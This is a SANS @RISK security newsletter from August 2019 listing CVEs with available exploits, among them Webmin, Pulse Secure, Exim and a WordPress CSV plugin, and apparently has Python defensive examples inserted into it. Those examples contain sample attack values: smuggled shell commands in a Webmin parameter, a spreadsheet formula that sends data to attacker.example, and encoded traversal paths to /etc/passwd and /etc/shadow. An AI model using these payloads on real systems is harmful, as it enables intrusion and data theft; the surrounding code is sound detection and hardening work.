@RISK provides a reliable weekly summary of (1) newly discovered attack vectors, (2) vulnerabilities with active new exploits, (3) insightful explanations of how recent attacks worked, and other valuable data
A key purpose of the @RISK is to provide the data that will ensure that the 20 Critical Controls (the US and UK benchmark for effective protection of networked systems) continue to be the most effective defenses for all known attack vectors. But since it is also valuable for security practitioners, SANS is making it available to the 145,000 security practitioners who have completed SANS security training and others at their organizations who hope to stay current with the offensive methods in use.
August 29, 2019
=============================================================
@RISK: The Consensus Security Vulnerability Alert
August 29, 2019 - Vol. 19, Num. 35
Providing a reliable, weekly summary of newly discovered attack vectors,
vulnerabilities with active exploits, and explanations of how recent
attacks worked
Archived issues may be found at http://www.sans.org/newsletters/at-risk
=============================================================
CONTENTS:
NOTABLE RECENT SECURITY ISSUES
INTERESTING NEWS FROM AROUND THE SECURITY COMMUNITY
VULNERABILITIES FOR WHICH EXPLOITS ARE AVAILABLE
MOST PREVALENT MALWARE FILES Aug. 22 - 29
============================================================
TOP VULNERABILITY THIS WEEK: Cisco 220 smart switches open to data leak
*************** Sponsored By AWS Marketplace ***************
Securing Applications in AWS. Experts from SANS, AWS and Fortinet explain the differences and similarities between securing cloud-based apps and hosting apps in-house. Learn how to assess your AppSec needs with consideration to AWS Marketplace offerings. Also, find out which tools and best practices you can use to improve the security of your applications. Webcast: Sept. 11, 2:00 PM ET. http://www.sans.org/info/214040
============================================================
TRAINING UPDATE
-- SANS Network Security 2019 | Las Vegas, NV | September 9-16 | https://www.sans.org/event/network-security-2019
-- SANS London September 2019 | September 23-28 | https://www.sans.org/event/london-september-2019
-- SANS Northern VA Fall-Reston 2019 | September 30-October 5 | https://www.sans.org/event/northern-va-fall-reston-2019
-- SANS DFIR Europe Summit and Training 2019 | Prague, CZ | September 30-October 6 | https://www.sans.org/event/dfir-prague-2019
-- SANS Tokyo Autumn 2019 | September 30-October 12 | https://www.sans.org/event/tokyo-autumn-2019
-- SANS Baltimore Fall 2019 | October 7-12 | https://www.sans.org/event/baltimore-fall-2019
-- SIEM Summit & Training 2019 | Chicago, IL | October 7-14 | https://www.sans.org/event/siem-summit-2019
-- SANS October Singapore 2019 | October 7-26 | https://www.sans.org/event/october-singapore-2019
-- Purple Team Summit & Training 2019 | Dallas, TX | October 21-28 | https://www.sans.org/event/purple-team-summit-2019
-- SANS OnDemand and vLive Training
Get a free GIAC Cert Attempt or take $350 off with OnDemand or vLive training through September 4.
https://www.sans.org/online-security-training/specials/
-- Can't travel? SANS offers online instruction for maximum flexibility
-- Live Daytime training with Simulcast - https://www.sans.org/simulcast
-- Evening training 2x per week for 6 weeks with vLive | https://www.sans.org/vlive
-- Anywhere, Anytime access for 4 months with OnDemand format | https://www.sans.org/ondemand/
-- Single Course Training
SANS Mentor | https://www.sans.org/mentor/about
Community SANS | https://www.sans.org/community/
-- View the full SANS course catalog and Cyber Security Skills Roadmap
https://www.sans.org/cyber-security-skills-roadmap
********************** Sponsored Links: ********************
1) What are the key processes, skills and technologies required for an effective supply chain security program? Register for this webcast: http://www.sans.org/info/214050
2) Take the SANS 2019 Endpoint Survey and enter for a chance to win a $400 Amazon gift card: http://www.sans.org/info/214055
3) Webcast September 3rd at 1 PM ET: Getting the Knack of ATT&CK(TM). http://www.sans.org/info/214060
============================================================
NOTABLE RECENT SECURITY ISSUES
SELECTED BY THE TALOS SECURITY INTELLIGENCE AND RESEARCH GROUP
Title: Cisco 220 smart switches open to data leak
Description: Two vulnerabilities in Cisco's 220 series of smart switches for small businesses could allow an attacker to leak sensitive information or inject malicious code. CVE-2019-1912 could allow an attacker to bypass security checks on the switch and upload arbitrary files. CVE-2019-1913 opens the switches to a buffer overflow attack, which could be used to remotely execute code on the device with root privileges.
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190806-sb220-rce
Snort SIDs: 51293 - 51295 (Written by John Levy), 51298 - 51300 (Written by Amit Raut), 51306 - 51307 (Written by Tim Muniz)
Title: Attackers actively exploiting Fortigate, Pulse Secure VPN and Webmin vulnerabilities
Description: Attackers are actively exploiting vulnerabilities in the Fortigate and Pulse Secure VPN services to steal encryption keys, passwords and other sensitive data. A separate set of campaigns, which started last week, targets the Webmin utility for managing Linux and *NIX systems. All of these are devices and services sitting in enterprise networks, and the vulnerabilities involved could allow an attacker to take complete control of a system.
Snort SIDs: 51240 - 51243 (Written by John Levy), 51288, 51289 (Written by Joanne Kim)
============================================================
INTERESTING NEWS FROM AROUND THE SECURITY COMMUNITY
Apple repatched a vulnerability in iOS that could allow iPhone users to jailbreak their devices -- a week after a hacker discovered an older patch had been undone.
https://www.cnet.com/news/apple-releases-ios-12-4-1-to-reportedly-fix-iphone-jailbreak/
The U.S. is close to launching a program to focus on protecting the 2020 U.S. presidential election from a ransomware attack.
https://www.cnbc.com/2019/08/26/us-officials-fear-ransomware-attack-against-2020-election.html
An independent security researcher dropped a zero-day vulnerability in Valve's Steam video game launcher after Valve banned him from the company's bug bounty program.
New emails uncovered between Facebook employees show that the social media giant may have known earlier than initially disclosed about Cambridge Analytica's mishandling of users' data.
https://techcrunch.com/2019/08/23/facebook-really-doesnt-want-you-to-read-these-emails/
Mobile carriers say an agreement with the U.S. government will start cutting down on robocalls, but researchers are skeptical of how effective the rules will be.
Spammers have started using Google calendar invites as a new form of social engineering.
Courthouses in Georgia are still using paper records to keep track of criminal cases and traffic citations months after a ransomware attack.
A recent round of ransomware attacks on cities in Texas could encourage attackers to carry out similar campaigns in the future.
https://www.cnbc.com/2019/08/22/texas-ransomware-attacks-tell-the-us-cybersecurity-story.html
=========================================================
RECENT VULNERABILITIES FOR WHICH EXPLOITS ARE AVAILABLE
COMPILED BY THE QUALYS VULNERABILITY RESEARCH TEAM
This is a list of recent vulnerabilities for which exploits are
available. System administrators can use this list to help in
prioritization of their remediation activities. The Qualys Vulnerability
Research Team compiles this information based on various exploit
frameworks, exploit databases, exploit kits and monitoring of internet
activity.
ID: CVE-2019-11510
Title: Pulse Secure Arbitrary File Disclosure Vulnerability
Vendor: Pulse Secure
Description: Pulse Connect Secure is exposed to an arbitrary file disclosure vulnerability. An attacker can send a specially crafted URI to read arbitrary files in the context of the application.
CVSS v2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
ID: CVE-2019-8605
Title: Apple MacOS Information Disclosure Vulnerability
Vendor: Apple
Description: An attacker could exploit this vulnerability to cause disclosure of information, unauthorized modification and arbitrary code execution with system privileges. Apple's advisory states: "A malicious application may be able to execute arbitrary code with system privileges. A use after free issue was addressed with improved memory management." The vulnerability was initially reported by Google Project Zero researcher Ned Williamson, who also published an exploit for iOS 12.2, dubbed "SockPuppet," after the first patch was released.
CVSS v2 Base Score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
ID: CVE-2019-12527
Title: Squid Buffer Overflow Vulnerability
Vendor: Squid
Description: Squid is exposed to a heap-based buffer overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. When checking Basic authentication credentials in an HTTP header, Squid decodes them into a global buffer without verifying that the decoded length does not exceed the buffer size, leading to a heap-based buffer overflow with user-controlled data. Successful exploitation allows attackers to execute arbitrary code in the context of the affected application.
CVSS v2 Base Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
ID: CVE-2019-15107
Title: Webmin Unauthenticated Remote Command Execution Vulnerability
Vendor: Webmin
Description: Webmin is exposed to a remote command execution vulnerability. The parameter old in password_change.cgi contains a command injection flaw. Affected versions are only vulnerable if changing of expired passwords is enabled. Successful exploitation may allow a remote attacker to execute arbitrary commands on the target system.
CVSS v2 Base Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
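The entry above names the injection point (the old parameter of password_change.cgi) without showing what a request abusing it looks like in logs. The following detection logic is an added example, not Webmin's code and not part of the newsletter: it walks HTTP request records and flags requests to that CGI whose old value carries shell metacharacters. The record layout and every sample request are constructed for the example; the old_param() helper is the place to adapt to whatever your proxy or web-server logs actually provide.

```python
"""Detection example added to this entry; it is not Webmin's code and not
part of the original newsletter.

CVE-2019-15107 is a command injection in the `old` parameter of
password_change.cgi. The scanner below walks HTTP request records and
flags requests to that CGI whose `old` value carries shell metacharacters.
The record layout and every sample request are constructed for the
example.
"""
import re
from urllib.parse import parse_qs

# Characters that let a value break out of a shell command. Some can occur
# in genuine passwords, so a hit is a triage lead, not a verdict.
SHELL_META = re.compile(r"[|;&`]|\$\(|\n")

TARGET_CGI = "/password_change.cgi"

# Constructed records: (client_ip, method, path, body). Not real traffic.
SAMPLE_REQUESTS = [
    ("198.51.100.7", "POST", "/password_change.cgi",
     "user=root&pam=&expired=2&old=hunter2&new1=NewPass1&new2=NewPass1"),
    ("203.0.113.9", "POST", "/password_change.cgi",
     "user=root&pam=&expired=2&old=foo|id&new1=x&new2=x"),
    ("203.0.113.9", "POST", "/password_change.cgi",
     "user=root&pam=&expired=2&old=foo%3Bwhoami&new1=x&new2=x"),
    ("192.0.2.4", "GET", "/", ""),
    ("198.51.100.8", "GET",
     "/password_change.cgi?user=root&old=x%60id%60&new1=a&new2=a", ""),
    # A real password containing '&' (percent-encoded by the browser) also
    # trips the rule; that is the false-positive case to expect.
    ("192.0.2.5", "POST", "/password_change.cgi",
     "user=admin&old=p%40ss%26word&new1=x&new2=x"),
]


def old_param(method, path, body):
    """Return the decoded `old` parameter of a password_change.cgi request,
    or None when the request is for some other resource."""
    raw_path, _, query = path.partition("?")
    if not raw_path.endswith(TARGET_CGI):
        return None
    params = parse_qs(body if method == "POST" else query,
                      keep_blank_values=True)
    return params.get("old", [""])[0]


def is_suspicious(method, path, body):
    """True when the request targets the CGI and `old` holds shell syntax."""
    old = old_param(method, path, body)
    return old is not None and SHELL_META.search(old) is not None


def scan(requests):
    """Return (client_ip, old_value) for every request that matches."""
    return [(ip, old_param(method, path, body))
            for ip, method, path, body in requests
            if is_suspicious(method, path, body)]


if __name__ == "__main__":
    for ip, old in scan(SAMPLE_REQUESTS):
        print(f"{ip}: suspicious 'old' value {old!r}")
```

Because the entry notes that only installations with expired-password changing enabled are exposed, a traffic rule like this is best paired with a host-side check of that setting; the rule tells you who is probing, the setting tells you whether the probe could have worked.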
ID: CVE-2019-15092
Title: WordPress Users & WooCommerce Customers Import Export Plugin CSV Injection Vulnerability
Vendor: WordPress
Description: The webtoffee "WordPress Users & WooCommerce Customers Import Export" plugin 1.3.0 for WordPress is exposed to a CSV injection vulnerability in the user_url, display_name, first_name and last_name columns of the CSV file created by the WF_CustomerImpExpCsv_Exporter class. Any application user can place spreadsheet formulas in these fields of their own profile; the formulas are executed when a user with greater privileges exports the data to CSV and opens that file on their machine.
CVSS v2 Base Score: 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
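The entry explains the attack but not the fix. The block below is an added example, not the plugin's code and not from the newsletter: it writes the same export both the vulnerable way (profile values copied as-is) and the hardened way (cells that could start a formula are forced to text), and includes an audit function for checking an export you already have. The column names are the ones the entry lists; the user rows are constructed sample data.

```python
"""Added example; not the plugin's code and not from the newsletter.

Spreadsheet software evaluates a CSV cell as a formula when it begins with
'=', '+', '-' or '@' (a leading tab or carriage return can smuggle one of
those in). CSV quoting does not help: "=cmd" inside double quotes is still
a formula once the file is opened. The fix is to force such cells to text
by prefixing a single quote. The column names are the ones the advisory
lists; the user rows are constructed sample data.
"""
import csv
import io

FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")
EXPORT_COLUMNS = ["user_login", "user_url", "display_name",
                  "first_name", "last_name"]

# Constructed: one ordinary user and one whose profile fields hold formulas.
SAMPLE_USERS = [
    {"user_login": "alice", "user_url": "https://example.org",
     "display_name": "Alice", "first_name": "Alice", "last_name": "Smith"},
    {"user_login": "mallory",
     "user_url": '=HYPERLINK("http://attacker.example/?"&A2,"profile")',
     "display_name": "@SUM(1,1)", "first_name": "-2+3", "last_name": "+cmd"},
]


def neutralise_cell(value):
    """Prefix a single quote when the cell could start a formula.

    The spreadsheet shows the original text; nothing is evaluated. Values
    such as '-2' or a '+44' phone number get the prefix too, which is the
    price of a rule that needs no allow-list.
    """
    if value and value[0] in FORMULA_TRIGGERS:
        return "'" + value
    return value


def export_users(rows, safe=True):
    """Serialise user rows to CSV text.

    safe=False reproduces the vulnerable behaviour (profile values written
    as-is); safe=True neutralises every cell first.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(EXPORT_COLUMNS)
    for row in rows:
        cells = [row.get(col, "") for col in EXPORT_COLUMNS]
        writer.writerow([neutralise_cell(c) for c in cells] if safe else cells)
    return buf.getvalue()


def parse_csv(text):
    """Read CSV text back into a list of rows."""
    return list(csv.reader(io.StringIO(text)))


def find_formula_cells(text):
    """Audit an existing export: (row, col, value) for every cell that a
    spreadsheet would treat as a formula."""
    return [(r, c, cell)
            for r, row in enumerate(parse_csv(text))
            for c, cell in enumerate(row)
            if cell and cell[0] in FORMULA_TRIGGERS]


if __name__ == "__main__":
    print(export_users(SAMPLE_USERS, safe=False))
    print("formula cells before hardening:",
          find_formula_cells(export_users(SAMPLE_USERS, safe=False)))
    print(export_users(SAMPLE_USERS))
    print("after:", find_formula_cells(export_users(SAMPLE_USERS)))
```

The CVSS vector above (AV:L) reflects where the code actually runs: on the workstation of whoever opens the export, which is why the export side, not the spreadsheet, is the right place to neutralise the cells.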
ID: CVE-2019-11013
Title: Nimble Streamer Directory Traversal Vulnerability
Vendor: Nimble Streamer
Description: Nimble Streamer is exposed to a "../" directory traversal vulnerability. Successful exploitation could allow an attacker to traverse the file system and access files or directories outside of the restricted directory on the remote server.
CVSS v2 Base Score: 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
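The entry names the plain "../" case. The following is an added example, not Nimble Streamer's code and not from the newsletter, of the check a file-serving component needs: it percent-decodes the request (twice, to catch double encoding), normalises backslashes, collapses "." and "..", rejects anything that climbs above the served root, and re-checks the absolute result against that root, so it also covers the encoded and mixed-separator variants beyond what the entry describes. The root directory and the sample requests are assumptions for the example.

```python
"""Added example; not Nimble Streamer's code and not from the newsletter.

A server that maps client-supplied paths onto a directory must refuse any
path that resolves outside it. resolve_under_root() percent-decodes the
request (twice, to catch double encoding), normalises backslashes to '/',
collapses '.' and '..', rejects anything that climbs above the root, and
finally re-checks the absolute result against the root. The root
directory and the sample requests are assumptions for the example.
"""
import os
import posixpath
from urllib.parse import unquote


class TraversalError(ValueError):
    """Raised when a requested path would escape the served directory."""


def resolve_under_root(root, requested):
    """Return the absolute filesystem path for `requested` under `root`,
    or raise TraversalError."""
    decoded = unquote(unquote(requested)).replace("\\", "/")
    if "\x00" in decoded:
        raise TraversalError("NUL byte in path")
    # Treat a leading '/' as root-relative, then collapse '.' and '..'.
    relative = posixpath.normpath(decoded.lstrip("/"))
    if relative == ".." or relative.startswith("../"):
        raise TraversalError(f"path climbs above root: {requested!r}")
    root_abs = os.path.abspath(root)
    candidate = os.path.normpath(os.path.join(root_abs, relative))
    # Belt and braces: the final path must still sit under root. On a live
    # filesystem use os.path.realpath() here so symlinks cannot bypass it.
    if os.path.commonpath([root_abs, candidate]) != root_abs:
        raise TraversalError(f"path escapes root: {requested!r}")
    return candidate


# Constructed requests: one benign, four traversal attempts in different
# encodings, and one that uses '..' without leaving the root.
SAMPLE_REQUESTS = [
    "video/stream1.m3u8",
    "../../etc/passwd",
    "video/..%2F..%2Fetc/passwd",
    "video/%252e%252e/%252e%252e/etc/shadow",
    "..\\..\\windows\\win.ini",
    "/video/../video/clip.ts",
]


def classify(root, requests):
    """Map each request to 'ok:<resolved path>' or 'blocked'."""
    result = {}
    for req in requests:
        try:
            result[req] = "ok:" + resolve_under_root(root, req)
        except TraversalError:
            result[req] = "blocked"
    return result


if __name__ == "__main__":
    for req, verdict in classify("/srv/media", SAMPLE_REQUESTS).items():
        print(f"{req!r:45} -> {verdict}")
```

Decoding twice is deliberate here because the check sits in front of a server that may decode once itself; if your component is the only decoder, a second unquote() would turn a legitimate literal "%25" in a filename into the wrong path, so match the decoding depth to the real pipeline.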
ID: CVE-2019-10149
Title: Exim Local Privilege Escalation Vulnerability
Vendor: Exim
Description: Exim is affected by a remote command execution vulnerability. The vulnerability is exploitable instantly by a local attacker. To exploit it remotely in the default configuration, an attacker must keep a connection to the vulnerable server open for 7 days (by transmitting one byte every few minutes), though faster methods may exist. Improper validation of the recipient address in the deliver_message() function in src/deliver.c may lead to remote command execution.
CVSS v2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
=========================================================
MOST PREVALENT MALWARE FILES Aug. 22 - 29:
COMPILED BY THE TALOS SECURITY INTELLIGENCE AND RESEARCH GROUP
SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3
MD5: 47b97de62ae8b2b927542aa5d7f3c858
VirusTotal: https://www.virustotal.com/gui/file/3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3/details
Typical Filename: qmreportupload.exe
Claimed Product: qmreportupload
Detection Name: Win.Trojan.Generic::in10.talos
SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510
MD5: 4a50780ddb3db16ebab57b0ca42da0fb
VirusTotal: https://www.virustotal.com/gui/file/7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510/details
Typical Filename: xme64-2141.exe
Claimed Product: N/A
Detection Name: W32.7ACF71AFA8-95.SBX.TG
SHA 256: 1755c179f08a648a618043a5af2314d6a679d6bdf77d4d9fca5117ebd9f3ea7c
MD5: c785a8b0be77a216a5223c41d8dd937f
VirusTotal: https://www.virustotal.com/gui/file/1755c179f08a648a618043a5af2314d6a679d6bdf77d4d9fca5117ebd9f3ea7c/details
Typical Filename: cslast.gif
Claimed Product: N/A
Detection Name: W32.1755C179F0-100.SBX.TG
SHA 256: 46b241e3d33811f7364294ea99170b35462b4b5b85f71ac69d75daa487f7cf08
MD5: db69eaaea4d49703f161c81e6fdd036f
VirusTotal: https://www.virustotal.com/gui/file/46b241e3d33811f7364294ea99170b35462b4b5b85f71ac69d75daa487f7cf08/details
Typical Filename: invoice.exe
Claimed Product: N/A
Detection Name: W32.46B241E3D3-95.SBX.TG
SHA 256: 093cc39350b9dd2630a1b48372abc827251a3d37bd88c35cea2e784359b457d7
MD5: 3c7be1dbe9eecfc73f4476bf18d1df3f
VirusTotal: https://www.virustotal.com/gui/file/093cc39350b9dd2630a1b48372abc827251a3d37bd88c35cea2e784359b457d7/details
Typical Filename: sayext.gif
Claimed Product: N/A
Detection Name: W32.093CC39350-100.SBX.TG
=============================================================
(c) 2019. All rights reserved. The information contained in this
newsletter, including any external links, is provided "AS IS," with no
express or implied warranty, for informational purposes only.
Please feel free to share this with interested parties via email, but
no posting is allowed on web sites. For a free subscription, (and for
free posters) or to update a current subscription, visit
SANS Institute, 8120 Woodmont Ave., Suite 310, Bethesda, MD 20814-2743